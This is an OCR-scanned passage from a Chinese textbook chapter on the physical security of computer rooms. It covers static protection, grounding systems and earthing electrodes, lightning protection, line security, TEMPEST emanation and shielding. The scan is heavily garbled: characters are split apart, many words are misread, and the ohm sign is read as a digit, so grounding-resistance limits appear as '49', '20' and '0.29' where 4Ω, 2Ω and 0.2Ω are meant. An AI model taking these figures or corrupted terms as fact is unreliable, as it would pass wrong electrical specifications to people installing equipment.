求 这 些 应 急电 源 设 备 具 有 高 可 靠 性 外 ,还 要 求 它们 具有 和 较 高 的 自动 化 程度 和 良好 的 可 管理 
性 ,以 便 在 意外 情况 发 生 时 可 以 保证 电源 的 可 靠 供 应 。 

3. 防 静 电 措施 

不 同 物体 间 的 相互 摩擦 ,接触 会 产生 能 量 不 大 但 电压 非常 高 的 静电 。 如 果 静 电 不 能 及 
时 释放 ,就 可 能 产生 火花 ,容易 造成 火灾 或 损坏 芯片 等 意外 事故 。 计 算 机 系统 的 CPU, 
ROM,RAM 等 关键 部 件 大 都 采用 MOS 工艺 的 大 规模 集成 电路 ,对 静电 极为 敏感 ,容易 因 
静电 而 损坏 。 

静电 对 电子 设备 的 损害 具有 如 下 特点 。 

CD 隐蔽 性。 人 体 不 能 直接 感知 静电 ,除非 发 生 静 电 放 电 , 但 是 发 生 静 电 放 电 人 体 也 不 
一 定 能 有 电击 的 感觉 ,这 是 因为 人 体感 知 的 静电 放电 电压 为 2 一 3kV, 所 以 静电 具有 隐 
ict 

(2) 潜在 性 。 有 些 电 子 元 器 件 受到 静电 损伤 后 的 性 能 没有 明显 下 降 , 但 多 次 累加 放电 
会 给 元 器 件 造 成 内 伤 而 形成 隐患 。 因 此 ,静电 对 元 器 件 的 损伤 具有 潜在 性 。 

(3) 随机 性 。 从 一 个 电子 元 器 件 生产 出 来 以 后 ,一 直到 它 损坏 以 前 ,时 刻 都 受到 静电 的 
威胁 ,而 这 些 静 电 的 产生 也 具有 随机 性 。 其 损坏 过 程 也 具有 随机 性 。 

(4) 复杂 性 。 静 电 放 电 损 伤 的 失效 分 析 工 作 , 因 电子 产品 的 精 、 细 ,微小 的 结构 特点 而 
费时 、 费 事 、 费 钱 , 要 求 较 高 的 技术 并 往往 需要 使 用 扫描 电镜 等 高 精密 仪器 。 Mino 
静电 损伤 现象 也 难以 与 其 他 原因 造成 的 损伤 加 以 区 别 , 使 人 误 把 静电 损伤 失效 当 作 其 他 失 
效 。 这 在 对 静电 放电 损害 未 充分 认识 之 前 ,常常 归 因 于 早期 失效 或 情况 不 明 的 失效 ,从 而 不 
自觉 地 掩盖 了 失效 的 真正 原因 。 所 以 ,静电 对 电子 元 器 件 损伤 的 分 析 具 有 复杂 性 

机 房 的 内 装修 材料 一 般 应 避免 使 用 挂 毯 ` 地 毯 等 吸 尘 、 容 易 产 生 静 电 的 材料 ， ,而 应 采用 
乙烯 材料 。 为 了 防 静电 ,机 房 一 般 要 安装 防 静电 地 板 ,并 将 地 板 和 设备 接地 以 便 将 设备 内 积 
聚 的 静电 迅速 释放 到 大 地 。 机 房 内 的 专用 工作 台 或 重要 的 操作 台 应 有 接地 平板 。 此 外 , 工 
作 人 员 的 服装 和 鞋 最 好 用 低 阻 值 的 材料 制作 ,机 房 内 应 保持 一 定 湿 度 . 特 别 是 在 干燥 季节 应 
适当 增加 空气 湿度 ,以 免 因 干燥 而 产生 静电 。 

4. 接地 与 防 雷 要 求 

接地 与 防 雷 是 保护 计算 机 网 络 系 统 和 工作 场所 安全 的 重要 安全 措施 。 

接地 是 指 整 个 计算 机 系统 中 各 处 电位 均 以 大 地 电位 为 零 参考 电位 。 接 地 可 以 为 计算 机 
系统 的 数字 电路 提供 一 个 稳定 的 0V 参考 电位 ,从 而 可 以 保证 设备 和 人 身 的 安全 ,同时 也 是 
防止 电磁 信息 泄露 的 有 效 手 段 。 

(1) 地 线 种 类 包括 以 下 几 种 。 

OD 保护 地 。 计 算 机 系统 内 的 所 有 电气 设备 均 应 接地 。 如 果 电 子 设 备 的 电源 线 绝缘 层 
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损坏 而 漏电 时 ,设备 的 外 壳 可 能 带电 ,造成 人 身 和 设备 事故 。 因 而 必须 将 外 壳 接 地 ,以 使 外 
碗 上 积聚 的 电荷 迅速 排放 到 大 地 。 

保护 地 一 般 是 为 大 电流 泄 放 而 接地 。 我 国 规定 ,机 房 内 保护 地 的 接地 电阻 小 于 或 等 于 
49。 保 护 地 在 插头 上 有 专门 的 一 条 芯 线 ,由 电缆 线 连接 到 设备 外 过, 插座 上 对 应 的 芯 线 (地 
线 ) 引 出 与 大 地 相连 。 保 护 地 线 应 连接 可 靠 ,一 般 不 用 焊接 ,而 采用 机 械 压 紧 连 接 。 地 线 导 
线 应 足够 粗 ,至 少 应 为 4 号 AWG 铜 线 ,或 为 金属 带 线 。 

© 直流 地 。 直 流 地 ,又 称 迎 辑 地 ,是 计算 机 系统 的 逻辑 参考 地 , 即 计 算 机 中 数字 电路 的 
低 电位 参考 地 。 数 字 电 路 只 有 1 和 0 两 种 状态 ,其 电位 差 一 般 为 3 一 5V。 随 着 超大 规模 集 
成 电路 技术 的 发 展 ,电位 差 越 来 越 小 ,对 逻辑 地 的 接地 要 求 也 越 来 越 高 。 因 为 逻辑 地 (0) 的 
电位 变化 直接 影响 到 数据 的 准确 性 。 直 流 地 的 接地 电阻 一 般 要 求 小 于 或 等 于 20。 

© 屏 项 地 。 为 避免 计算 机 网 络 系统 各 种 设备 间 的 电磁 干扰 ,防止 电磁 信息 泄露 ,重要 
的 设备 和 重要 的 机 房 都 要 采取 适当 的 屏蔽 措施 , 即 用 金属 体 来 屏蔽 设备 或 整个 机 房 。 金 属 
体 称 为 屏蔽 机 柜 或 屏蔽 室 。 屏 项 体 需 与 大 地 相连 ,形成 电气 通路 ,为 屏蔽 体 上 的 电荷 提供 一 
条 低 阻 抗 的 泄 放 通路 。 屏 项 效果 的 好 坏 与 屏蔽 体 的 接地 密切 相关 ,一 般 屏蔽 地 的 接地 电阻 
要 求 小 于 或 等 于 40. 

CD 静电 地 。 机 房 内 人 体 本 身 ` 人 体 在 机 房 内 的 运动 ` 设 备 的 运行 等 均 可 能 产生 静电 。 
人 体 静 电 有 时 可 达 上 千 伏 ,人 体 与 设备 或 元 器 件 导电 部 分 直接 接触 极 易 造成 设备 损坏 ,而 设 
备 运 行 中 产生 的 静电 干扰 则 会 引起 设备 的 运行 故障 。 为 消除 静电 可 能 带 来 的 不 良 影响 , 除 
采取 如 测试 人 体 静 电 、 接 触 设备 前 先 触摸 地 线 、 汇 放电 荷 、 保 持 室 内 一 定 的 温度 和 湿度 等 管 
理 方面 的 措施 外 ,还 应 使 用 防 静电 地 板 等 ,即将 地 板 金属 基体 与 地 线 相连 ,以 使 设备 运行 中 
产生 的 静电 随时 释放 。 

C) 雷击 地 。 雷 电 具 有 很 大 的 能 量 ,雷击 产生 的 瞬时 电压 可 高 达 10MV 以 上 。 单 独 建设 
的 机 房 或 机 房 所 在 的 建筑 物 ,必须 设置 专门 的 雷击 保护 地 (简称 雷击 地 ), 以 防 雷 击 产生 的 巨大 
能 量 和 高 压 对 设备 和 人 身 造 成 危害 。 应 将 具有 良好 导电 性 能 和 一 定 机 械 强 度 的 避雷 针 安 置 在 
建筑 物 的 最 高 处 , 引 下 导线 接 到 地 网 或 地 桩 上 ,形成 一 条 最 短 的 .牢固 的 对 地 通路 , 即 雷击 地 
线 。 防 雷击 地 线 地 网 和 接地 桩 应 与 其 他 地 线 系统 保持 一 定 的 距离 ,应 在 10m 以 上 。 

(2) 接地 系统 。 计 算 机 机 房 的 接地 系统 是 指 计算 机 系统 本 身 和 场地 的 各 种 地 线 系统 的 
设计 和 具体 实施 。 

各 自 独立 的 接地 系统 。 这 种 接地 系统 主要 考虑 直流 地 、 交 流 地 ,保护 地 、 屏 项 地 、 雷 
击 地 等 的 各 自作 用 ,为 避免 相互 干扰 ,分别 单 独 通过 地 网 或 接地 桩 接 到 大 地 。 这 种 方案 虽然 
理论 上 可 行 , 但 实施 起 来 难度 很 大 。 

O 交 、 直 流 分 开 的 接地 系统 。 这 种 接地 系统 将 计算 机 的 迎 辑 地 和 雷击 地 单独 接地 ,其 
他 地 共 地 。 这 既 可 使 计算 机 工作 可 靠 , 又 可 减少 一 些 地 线 。 但 这 样 仍 需 3 个 单独 的 接地 体 ， 
无 论 从 接地 体 的 埋设 场地 考虑 ,还 是 从 投资 和 施工 难度 考虑 ,都 是 很 难 承受 的 。 

© 共 地 接地 系统 。 共 地 接地 系统 的 出 发 点 是 除 雷 击 地 外 , 另 建 一 个 接地 体 ,此 接地 体 
的 地 阻 要 小 ,以 保证 泄 放 电荷 迅速 排放 到 大 地 。 计 算 机 系统 的 直流 地 、 保 护 地 ` 屏 项 地 等 在 
机 房 内 单独 接 到 各 自 的 接地 母线 , 自 成 系统 ,再 分 别 接 到 室外 的 接地 体 上 。 这 种 接地 的 优点 
是 减少 了 接地 体 的 建设 ,各 地 之 间 独 立 ; 不 会 产生 相互 干扰 。 缺 点 是 直流 地 (逻辑 地 ) 与 其 
他 地 线 共 用 , 易 受 其 他 信号 干扰 影响 。 
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第 2 章 ”实体 和 基础 设施 安全 


OD 直流 地 、 保 护 地 共用 地 线 系统 。 这 种 接地 系统 的 直流 地 和 保护 地 共用 接地 体 , 屏 项 
地 、 交 流 地 、 雷 击 地 单独 埋设 。 该 接地 方案 的 出 发 点 是 许多 计算 机 系统 内 部 已 将 直流 地 和 保 
护 地 连 在 一 起 ,对 外 只 有 一 条 引线 ,在 此 情况 下 ,直流 地 与 保护 地 分 开 已 无 实际 意义 。 由 于 
直流 地 与 交流 地 分 开 , 使 计算 机 系统 仍 具 有 和 较 好 抗 干 扰 能 力 。 

C) 建筑 物 内 共 地 系统 。 随 着 城市 高 层 建筑 群 的 不 断 增多 ,建筑 物 内 各 种 设备 和 供电 系 
统 、 通 信 系统 的 接地 问题 越 来 越 突 出 。 一 方面 ,建筑 高 层 化 、 密 集 化 ,接地 设备 多 、 要 求 高 ; 

一 方面 ,高 层 建筑 附近 又 不 可 能 有 足够 的 场地 构造 地 线 接地 体 。 高 层 建筑 目前 的 基础 设 
施 都 是 光 打 桩 , 整 栋 建筑 从 下 到 上 都 有 钢筋 基础 。 由 于 这 些 钢 筋 基础 很 多 , 且 连 成 一 体 , 深 
入 地 下 漏水 层 ,同时 各 楼 层 钢 筋 均 与 地 下 钢筋 相连 ,作为 地 线 接地 电阻 很 小 (经 实际 测量 可 
小 于 0.29)。 由 于 接地 电阻 很 小 ,可 将 计算 机 机 房 及 各 种 设备 的 地 线 共用 建筑 地 ,从 理论 上 
讲 不 会 产生 相互 干扰 ,从 实际 应 用 看 也 是 可 行 的 。 它 具有 投资 少 、 占 地 少 、 阻 值 稳定 等 特点 ， 
符合 城市 建筑 的 发 展 趋势 。 

G) 接地 体 。 接 地 体 的 埋设 是 接地 系统 好 坏 的 关键 。 通 常 使 用 的 接地 体 有 地 桩 、 水 平 
机 网 、 金 属 接地 板 、 建 筑 物 基础 钢筋 等 。 

CD 地 桩 。 垂 直 打 入 地 下 的 接地 金属 棒 或 金属 管 ,是 常用 的 接地 体 。 它 用 在 土壤 层 超过 
3m 厚 的 地 方 。 金 属 棒 的 材料 为 钢 或 铜 ,直径 一 般 应 为 15mm 以 上 。 为 防止 腐蚀 、 增 大 接触 
面积 并 承受 打击 力 ,地 桩 通常 采用 较 粗 的 镀 锌 钢管 

金属 棒 做 地 桩 形成 的 地 阻 主要 与 金属 棒 的 长 度 和 土壤 情况 有 关 , 受 直径 的 影响 不 大 。 
金属 棒 的 长 度 一 般 选择 3m 以 上 。 由 于 单 根 接地 桩 接地 电阻 较 大 ,在 实际 使 用 中 常 将 多 根 
接地 桩 连 成 环形 或 网 格 形 ,每 两 根 地 桩 间 的 距离 一 般 要 大 于 地 桩 长 度 的 2 倍 。 

土壤 的 含水 率 和 含 盐 量 的 多 少 决定 了 土壤 的 电阻 率 ,而 土壤 电阻 率 是 决定 地 线 接地 电 
阻 的 重要 因素 。 为 降低 大 地 电阻 率 常 需要 采取 水 分 保持 和 化 学 盐 化 措施 。 

在 地 网 表层 土壤 中 适当 种 植 草 类 或 豆 类 植物 , 既 可 以 保持 土壤 中 的 水 分 ,又 不 会 出 现 盐 
分 流失 的 现象 。 此 外 ,在 接地 桩 周围 土壤 中 要 添加 一 些 产 生 离 子 的 化 学 物品 ,以 提高 土壤 的 
电导 率 。 这 些 化 学 物品 有 硫酸 镁 硝酸 钾 、 握 化 钠 等 。 其 中 硫酸 镁 是 一 种 较 好 的 降 阻 材料 ， 
它 成 本 低 ,电导 率 高 ,对 接地 电极 和 附近 的 金属 物体 腐蚀 作用 弱 。 在 土壤 中 添加 硫酸 镁 ,可 
以 采用 在 地 桩 周围 挖 一 个 0. 3m 深 的 壕沟 ,在 沟 内 填 满 硫酸 镁 ,用 土 覆盖 的 方法 。 这 样 , 硫 
酸 镁 不 与 地 桩 直接 接触 ,以 使 其 分 布 最 佳 而 腐蚀 作用 又 最 小 。 另 一 种 方法 是 用 一 个 0. 6m 
长 的 套 管 套 在 地 桩 外 面 , 套 管内 填充 硫酸 镁 至 距 地 面 0. 3m, 套 管 与 地 面 持 平 并 用 木 盖 盖 住 
管 口 。 这 样 , 套 管 内 的 硫酸 镁 会 随 着 雨水 均匀 地 潜入 地 桩 周围 。 

化 学 盐 化 并 不 能 永久 地 改变 接地 电阻 。 化 学 材料 会 随 着 雨水 逐渐 流失 ,一般 有 效 期 为 
3 年 , 随 着 时 间 的 延长 应 适当 补充 化 学 材料 。 

Q 水 平 栅 网 。 在 土质 情况 较 差 , 特 别 是 岩层 接近 地 表面 无 法 打桩 的 情况 下 ,可 以 采用 
水 平 埋 设 金属 条 带 、 电 缆 的 方法 。 金 属 条 带 应 埋 在 地 下 0. 5— 1m 深 处 ,水 平方 向 构成 星 形 
或 栅 格 网 形 ,在 每 个 交叉 处 ,条 带 应 焊接 在 一 起 , 且 带 间距 离 大 于 lm。 水 平 铺设 金属 条 带 的 
方法 ,同样 要 求 采 取保 持 水 平和 增加 化 学 盐分 的 方法 ,使 土壤 的 电阻 率 降 低 。 

@ 金属 接地 板 。 这 种 方法 是 将 金属 板 与 地 面 垂直 埋 在 地 下 ,与 土壤 形成 至 少 0. 2m* Hg 
双 面 接触 。 深 度 要 求 在 永久 性 潮 土壤 以 下 30cm, 一 般 至 少 在 地 下 埋 1. 5m 深 。 人 金属 板 的 材 
料 通常 为 铜板 ,也 可 分 为 铁 板 或 钢板 。 这 种 方法 占 地 面积 小 ,但 为 获得 较 好 的 效果 ,必须 埋 
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设 多 个 金属 板 , 使 埋设 难度 和 造价 增高 。 因 此 , 除 特殊 情况 外 ,近年 来 金属 接地 板 已 逐渐 被 
地 桩 所 代替 。 

CD 建筑 物 基础 钢筋 。 现 代 高 层 建筑 的 基础 桩 深入 地 下 几 十 米 , 钢 筋 在 地 下 形成 很 大 的 
地 网 并 从 地 下 延伸 至 顶层 ,每 层 均 可 接地 线 。 这 种 接地 体 节省 场地 ,经 济 、 适 用 ,是 城市 建设 
机 房 地 线 的 发 展 方向 。 

(4) 防 雷 措施 。 机 房 的 外 部 防 雷 应 使 用 防 闪 器 、. 引 下 线 和 接地 装置 ,吸引 雷电 流 , 并 为 
其 汇 放 提供 一 条 低 阻 值 通道 。 机 器 设备 应 有 专用 地 线 ,机房 本 身 有 避雷 设施 ,包括 通信 设备 
和 电源 设备 有 防 雷 击 的 技术 设施 ,机 房 的 内 部 防 雷 主要 采取 屏蔽 ,等 电位 连接 ,合理 布线 或 
防 闪 器 、 过 电压 保护 等 技术 措施 以 及 拦截 ,屏蔽 、 均 太 、 分 流 、 接 地 等 方法 ,达到 防 雷 的 目的 。 
机 房 的 设备 本 身 也 应 有 避雷 装置 和 设施 。 机 房 防 雷 工程 一 般 要 做 以 下 两 步 。 

CD 做 好 机 房 接地 。 交 流 工 作 地 直流 工作 地 、 保 护 地 、 防 雷 地 宣 共用 一 组 接地 装置 ,其 
接地 电阻 按 其 中 最 小 值 要 求 确 定 。 如 果 计 算 机 系统 直流 地 与 其 他 地 线 分 开 接地 , 则 两 地 极 
间 应 间隔 25m. 

© 做 好 线路 防 雷 。 在 动力 室 电源 线 总 配 电 盘 上 安装 并 联 式 专用 避雷 器 ,构成 第 一 级 衰 
减 。 在 机 房 配 电 柜 进 线 处 安装 并 联 式 电源 避雷 器 ,构成 第 二 级 衰减 。 机 房 布线 不 能 延 墙 数 
设 ,以 防止 雷击 时 墙 内 钢筋 瞬间 传导 强 雷 电流 时 ,瞬间 变化 的 磁场 在 机 房 内 的 线路 上 感应 出 
瞬间 的 高 脉冲 浪 涌 电 压 , 会 把 设备 击 坏 。 
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尽管 从 网 络 通信 线路 上 提取 信息 所 需要 的 技术 比 直接 从 通信 终端 获取 数据 的 技术 要 高 
几 个 数量 级 ,不 过 ,以 目前 的 技术 水 平 也 是 完全 有 可 能 实现 的 。 

1. 电缆 加 压 技术 

用 一 种 简单 (但 很 昂贵 ) 的 高 技术 加 压 电 缆 , 可 以 获得 通信 线路 上 的 物理 安全 。 这 一 技 
术 是 若干 年 前 为 美国 国家 电话 系统 开发 的 。 通 信和 电缆 密封 在 塑料 套 管 中 ,并 在 线 缆 的 两 端 
充气 加 压 。 线 上 连接 了 带 有 报警 器 的 监视 器 ,用 来 测量 压力 。 如 果 压 力 下 降 , 则 意味 电缆 可 
能 被 破坏 了 ,技术 人 员 还 可 以 进一步 检测 出 破坏 点 的 位 置 ,以 便 及 时 进行 修复 。 

电缆 加 压 技术 提供 了 安全 的 通信 线路 。 将 加 压 电缆 架设 于 整 座 楼 中 ,每 寸 电 绕 都 将 暴 
露 在 外 。 如 果 任 何人 企图 割 电缆 ,监视 器 会 启动 报警 器 ,通知 安全 保卫 人 员 电 缆 已 被 破坏 。 
假设 任何 人 成 功 地 在 电缆 上 接 了 自己 的 通信 线路 ,在 安全 人 员 定 期 地 检查 电缆 的 总 长 度 时 ， 
就 可 以 发 现 电缆 拼接 处 。 加 压 电缆 是 屏蔽 在 波纹 铝 钢 丝 网 中 的 ,几乎 没有 电磁 辐射 ,从 而 大 
大 增强 了 通过 通信 线路 窃听 的 难度 。 

光纤 通信 线 曾 被 认为 是 不 可 搭 线 窃听 的 ,其 断 破 处 立即 会 被 检测 到 ,拼接 处 的 传输 速度 
会 缓慢 得 令 人 难以 忍受 。 光 纤 没 有 电磁 辐射 ,所 以 也 不 能 用 电磁 感应 窃 密 。 不 幸 的 是 ,光纤 
的 最 大 长 度 有 限制 ,目前 网 络 覆盖 范围 的 半径 约 100km, 大 于 这 一 长 度 的 光纤 系统 必须 定 
期 地 放大 (复制 ) 信 号 。 这 就 需要 将 信号 转换 成 电 脉冲 ,然后 再 恢复 成 光 脉 冲 ,继续 通过 另 一 
条 线路 传送 。 完 成 这 一 操作 的 设备 (复制 器 ) 是 光纤 通信 系统 的 安全 薄弱 环节 ,因为 信号 可 
能 在 这 一 环节 被 措 线 窃听 。 有 两 个 办 法 可 解决 这 一 问题 : 距离 大 于 最 大 长 度 限制 的 系统 之 
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间 , 不 采用 光纤 线 通 信 ; 或 加 强 复制 器 的 安全 ,如 用 加 压 电缆 、 警 报 系 统 和 加 强 警卫 等 措施 。 

2. 电磁 兼容 和 电磁 辐射 

实际 实验 表明 ,普通 计算 机 的 显示 器 辐射 的 屏幕 信息 可 以 在 几 百 米 到 1000 多 米 的 范围 
内 用 测试 设备 清楚 地 再 现 出 来 。 实 际 上 ,计算 机 的 CPU 芯片 、 键 盘 、 磁 盘 驱 动 器 和 打印 机 
在 运行 过 程 中 都 会 向 外 辐射 信息 。 要 防止 硬件 向 外 辐射 信息 ,必须 了 解 计算 机 各 部 件 泄露 
的 原因 和 程度 ,然后 采取 相应 的 防护 措施 。 

计算 机 及 其 外 部 设备 可 以 通过 两 种 途径 向 外 泄露 : 电磁 波 辐 射 和 通过 各 种 线路 与 机 房 
通 往 屋外 的 导管 传导 出 去 。 例 如 ,计算 机 的 显示 器 是 阴极 射线 管 ,其 强大 交 变 的 工作 电流 产 
生 随 显示 信息 变化 的 电磁 场 ,把 显示 信息 向 外 辐射 ; 计算 机 系统 的 电源 线 、 机 房 内 的 电话 
线 、 暧 气管 道 , 地 线 等 金属 导体 有 时 会 起 着 无 线 天 线 的 作用 ,它们 可 以 把 从 计算 机 辐射 出 来 
的 信息 发 射出 去 。 

计算 机 电磁 辐射 强度 与 载 流 导线 中 电流 强度 的 大 小 、 设 备 功率 的 强 弱 ,信号 频率 的 高 低 成 
正 向 影响 关系 ,与 离 辐射 源 距离 的 远近 成 反 向 影响 关系 ,与 辐射 源 是 否 被 屏蔽 也 有 很 大 关系 。 

计算 机 网 络 系统 的 各 种 设备 都 属于 电子 设备 ,在 工作 时 都 不 可 避免 地 会 向 外 辐射 电磁 
波 ,同时 也 会 受到 其 他 电子 设备 的 电磁 波 干扰 , 当 电磁 干扰 达到 一 定 的 程度 就 会 影响 设备 的 
正常 工作 。 

电磁 干扰 可 以 通过 电磁 辐射 和 传导 两 条 途径 影响 电子 设备 的 工作 。 一 条 是 电子 设备 辆 
射 的 电磁 波 通过 电路 耦合 到 另 一 台电 子 设备 中 引起 和 干扰: 另 一 条 是 通过 连接 的 导线 .电源 
线 、 信 号 线 等 耦合 而 引起 相互 之 间 的 干扰 。 

电子 设备 及 其 元 器 件 都 不 是 孤立 存在 的 ,而 是 在 一 定 的 电磁 干扰 的 环境 下 工作 的 。 电 
磁 兼 容 性 就 是 电子 设备 或 系统 在 一 定 的 电磁 环境 下 互相 兼顾 `. 相 容 的 能 力 。 

电磁 兼容 问题 由 来 已 久 。1831 年 ,法 拉 第 发 现 电 磁感应 现象 ,总结 出 电磁 感应 定律 
1881 年 ,英国 科学 家 希 维 思 德 发 表 了 “ 论 干扰 ”的 文章 ; 1888 年 ,赫兹 通过 试验 演示 了 电磁 
干扰 现象 。20 世纪 以 来 ,特别 是 在 第 二 次 世界 大 战 中 ,电磁 兼容 理论 进一步 发 展 ,逐步 形成 
了 一 门 独立 的 学 科 。 电 磁 兼 容 设计 已 成 为 军用 武器 装备 和 电子 设备 研制 中 心 必须 严格 遵守 
的 原则 ,电磁 兼容 性 成 为 产品 可 靠 性 保证 的 重要 组 成 部 分 。 如 果 设 备 的 电磁 兼容 性 很 差 ,在 
电磁 干扰 的 环境 中 就 不 能 正常 工作 。 我 国 已 将 电磁 兼容 性 作为 强制 性 的 标准 来 执行 。 

1985 年 ,在 法 国 举办 的 “计算 机 与 通信 安全 ?国际 会 议 上 ,荷兰 的 一 位 工程 师 现场 演示 
了 用 一 套 稍 加 改装 的 黑白 电视 机 还 原 1km 以 外 机 房 内 计算 机 显示 屏 上 的 信息 。 这 说 明 计 
算 机 的 电磁 辐射 造成 信息 泄露 的 危险 是 真实 存在 的 。 尤 其 是 在 微 电 子 技术 和 卫星 通信 技术 
飞速 发 展 的 今天 ,各 种 信息 窃取 手段 日 趋 先进 ,电磁 辐射 泄密 的 危险 也 越 来 越 大 。 

美 、 俄 等 发 达 国家 对 电磁 辐射 泄密 问题 进行 了 多 年 的 研究 ,并 逐渐 形成 了 一 种 专门 的 
技术 一 一 抑制 信息 处 理 设备 的 噪声 泄露 技术 ,简称 信息 泄露 防护 技术 (Tempest 技术 )。 
Tempest 技术 是 一 项 综合 性 非常 强 的 技术 ,包括 泄露 信息 的 分 析 、 预 测 、 接 收 \ 识 别 、 复 原 、 防 
护 、 测 试 、 安 全 评估 等 技术 ,涉及 多 个 学 科 领 域 。Tempest 技术 基本 上 是 在 传统 的 电磁 兼容 
理论 的 基础 上 发 展 起 来 的 ,但 比 传统 的 抑制 电磁 干扰 的 要 求 高 得 多 ,技术 实现 上 也 更 复杂 。 
一 般 认 为 ,显示 器 的 视频 信号 ,打印 机 打印 头 的 驱动 信号 、 磁 头 读 / 写 信和 号、 键盘 输入 信号 以 
及 信号 线 上 的 输入 输出 信号 等 为 需要 重点 防护 的 对 象 。 美 国政 府 规定 , 凡 属 高 度 机 密 部 门 
所 使 用 的 计算 机 等 信息 处 理 设备 ,其 电磁 泄漏 发 射 必 须 达 到 Tempest 标准 规定 的 要 求 。 
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3. 电磁 辐射 防护 的 措施 

为 保证 计算 机 网 络 系统 的 物理 安全 , 除 在 网 络 规划 和 场地 、 环 境 等 方面 进行 防护 之 外 ， 
还 要 防止 数据 信息 在 空间 中 的 扩散 。 计 算 机 系统 通过 电磁 辐射 使 信息 被 截获 而 失 密 的 案例 
已 经 很 多 ,在 理论 和 技术 支持 下 的 验证 工作 也 证 实 ,这 种 对 距离 在 近 千 米 显 示 屏 信息 的 还 
原 , 给 计算 机 系统 信息 的 保密 工作 带 来 了 极 大 的 威胁 。 为 了 防止 计算 机 系统 中 的 数据 信息 
在 空间 中 的 扩散 ,通常 是 在 物理 上 采取 一 定 的 防护 措施 ,以 减少 或 干扰 扩散 到 空间 中 电磁 信 
号 。 政 府 . 军 队 、 金 融 机 构 在 构建 信息 中 心 时 ,电磁 辐射 防护 将 成 为 首先 要 解决 的 问题 。 

目前 防护 措施 主要 有 两 类 : 一 类 是 对 传导 发 射 的 防护 ,主要 采取 对 电源 线 和 信号 线 加 
装 性 能 良好 的 滤波 器 , 减 小 传输 阻抗 和 导线 间 的 交叉 夸 合 ; 另 一 类 是 对 辐射 的 防护 ,这 类 防 
护 措 施 又 可 分 为 两 种 : 一 种 是 采用 各 种 电磁 屏蔽 措施 ,如 对 设备 的 金属 屏蔽 和 各 种 接 插件 
的 屏蔽 ,同时 对 机 房 的 下 水 管 .暖气 管 和 金属 门窗 进行 屏蔽 和 隔离 ; 第 二 种 是 干扰 的 防护 措 
施 , 即 在 计算 机 系统 工作 的 同时 ,利用 干扰 装置 产生 一 种 与 计算 机 系统 辐射 相关 的 伪 噪 声 向 
空间 辐射 来 掩盖 计算 机 系统 的 工作 频率 和 信息 特征 。 

为 提高 电子 设备 的 抗 干扰 能 力 , 除 在 芯片 .部 件 上 提高 抗 干扰 能 力 外 ,主要 的 措施 有 屏 
项 、 滤 波 、 隔 离 . 吸 波 、 接 地 等 ,其 中 屏蔽 是 应 用 最 多 的 方法 。 

(1) 屏 项 。 电 磁 波 经 封闭 的 金属 板 后 ,大 部 分 能 量 被 吸收 ` 反 射 和 再 反射 ,再 传 到 板 内 
的 能 量 已 经 很 小 ,从 而 保护 内 部 的 设备 或 电路 免 受 强 电磁 干扰 。 

(2) 滤波 。 滤 波 是 另 一 种 重要 的 方法 。 滤 波 电 路 是 一 种 无 源 网 络 , 它 可 以 让 一 定 频率 
范围 内 的 电信 号 通过 而 阻止 其 他 频率 的 电信 号 ,从 而 起 到 滤波 作用 。 在 有 导线 连接 或 阻抗 
耦合 的 情况 下 ,进出 线 采 用 滤波 器 可 使 强 干 扰 被 阻止 。 吸 波 是 采用 铁 氧 体 等 吸 波 材料 ,在 空 
间 很 小 的 情况 下 起 到 类 似 滤 波 器 的 作用 。 

(3) 隔离 。 隔 离 是 将 系统 内 的 电路 采用 隔离 的 方法 分 别处 理 , 将 强 辆 射 源 、 信 号 处 理 单 
元 等 隔离 开 ,单独 处 理 , 从 而 减弱 系统 内 部 和 系统 向 外 的 电磁 辆 射 。 

(4) 接地 。 接 地 对 电磁 兼容 来 说 十 分 重要 , 它 不 仅 可 以 起 到 保护 作用 ,而 且 可 以 使 屏蔽 
体 、 滤 波 器 等 集聚 的 电荷 迅速 排放 到 大 地 ,从 而 减 小 干扰 。 作 为 电磁 兼容 目的 的 地 线 最 好 单 
独 埋 放 , 对 其 地 阻 、 接 地 点 等 均 有 很 高 的 要 求 。 

电磁 防护 层 主要 是 通过 上 述 种 种 措施 ,提高 计算 机 的 电磁 兼容 性 ,提高 设备 的 抗 干扰 能 
力 。 使 计算 机 能 抵抗 强 电磁 干扰 ; 同时 将 计算 机 的 电磁 泄漏 发 射 降 到 最 低 ,使 之 不 致 将 有 
用 的 信息 泄露 出 去 。 

4. 辐射 抑制 技术 

物理 抑制 技术 可 以 分 为 包容 法 与 抑 源 法 两 类 。 

(1) 包容 法 。 主 要 采用 屏蔽 技术 屏蔽 线路 单元 ,整个 设备 ,甚至 整个 系统 以 防止 电磁 波 
向 外 辐射 。 包 容 法 主要 从 结构 .工艺 和 材料 等 方面 考虑 减少 辆 射 的 各 种 方法 ,成 本 较 高 , 适 
合 于 少量 应 用 。 

(2) 抑 源 法 。 试 图 从 线路 和 元 器 件 入 手 , 消 除 计算 机 和 外 部 设备 内 部 产生 较 强 电磁 波 
的 根源 。 主 要 采用 的 措施 有 : 选用 低 电 压 、 低 功率 的 元 器 件 ; 在 电路 布线 设计 中 注意 降低 
辆 射 和 耦合 ; 采用 电源 滤波 与 信号 滤波 技术 ; 采用 可 以 阻挡 电磁 波 的 透明 膜 。 另 外 ,也 可 
以 采取 下 面 的 方法 。 

采用 ”* 红 / 黑 ” 隔 离 技术 ,其 中 * 红 ”是 指 设备 中 有 信息 泄露 危险 的 区 域 `. 元 器 件 .部 件 和 连 
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线 “ 黑 ?表示 无 泄露 危险 的 区 域 或 连 线 。 将 * 红 ”与 * 黑 ?隔离 可 以 防止 它们 之 间 的 耦合 ,可 以 
重点 加 强 对 红 区 的 防护 措施 。 这 种 方法 的 技术 复杂 ,但 成 本 较 低 ,适用 于 大 量 应 用 。 

在 计算 机 旁边 放置 一 个 辐射 干扰 器 ,不 断 地 向 外 辐射 干扰 电磁 波 ,该 电磁 波 可 以 扰乱 计 

算 机 发 出 的 信息 电磁 波 ,使 远 处 侦 测 设备 无 法 还 原 计 算 机 信和 号。 挑选 干扰 器 时 要 注意 干扰 
器 的 带宽 是 否 与 计算 机 的 辐射 带宽 相近 ,否则 起 不 到 干扰 作用 ,这 需要 通过 测试 验证 。 
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物理 安全 主要 包括 环境 安全 、 设 备 安 全 、 电 源 系 统 安全 以 及 通信 线路 安全 4 个 方面 , 通 
过 对 这 4 个 方面 的 详细 介绍 ,帮助 读者 了 解 物 理 安全 的 相关 知识 ,并 且 能 够 运行 本 章 介 绍 的 
知识 和 技术 来 保障 计算 机 系统 的 物理 安全 。 


27 J 题 

1. 填空 题 

